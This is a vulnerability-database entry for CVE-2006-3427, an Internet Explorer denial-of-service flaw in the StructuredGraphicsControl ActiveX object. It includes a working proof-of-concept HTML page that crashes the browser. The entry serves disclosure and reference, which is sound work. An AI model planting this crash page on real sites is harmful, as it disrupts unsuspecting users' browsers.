Microsoft IE StructuredGraphicsControl Remote Denial-of-Service Vulnerability

Vulnerability ID: 1110574 Vulnerability type: Other
Published: 2006-07-06 Updated: 2007-06-26
CVE ID: CVE-2006-3427 CNNVD-ID: CNNVD-200607-089
Platform: Windows CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/28169
https://www.securityfocus.com/bid/18855
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-089
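|Vulnerability details
Microsoft IE is a very popular web browser released by Microsoft. Microsoft IE has a vulnerability in its handling of ActiveX objects, which a remote attacker may exploit to crash the user's IE. When IE calls URLOpenBlockingStream() while handling the ActiveX control, the ppStream parameter triggers a null pointer dereference; if a user is tricked into visiting a malicious web page, the result is a denial of service.
|Exploit (EXP)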
source: http://www.securityfocus.com/bid/18855/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability because it fails to handle ActiveX controls properly.

This issue is triggered when an attacker convinces a victim user to activate a malicious ActiveX control.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<html><body><script>

// MoBB Demonstration
function Demo() {
        var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
        a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>
|Affected products
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
|References

Source: BID
Name: 18855
Link: http://www.securityfocus.com/bid/18855
Source: OSVDB
Name: 26839
Link: http://www.osvdb.org/26839
Source: VUPEN
Name: ADV-2006-2687
Link: http://www.frsirt.com/english/advisories/2006/2687
Source: MISC
Link: http://browserfun.blogspot.com/2006/07/mobb-6-structuredgraphicscontrol.html
Source: XF
Name: ie-structuredgraphicscontrol-sourceurl-dos(27565)
Link: http://xforce.iss.net/xforce/xfdb/27565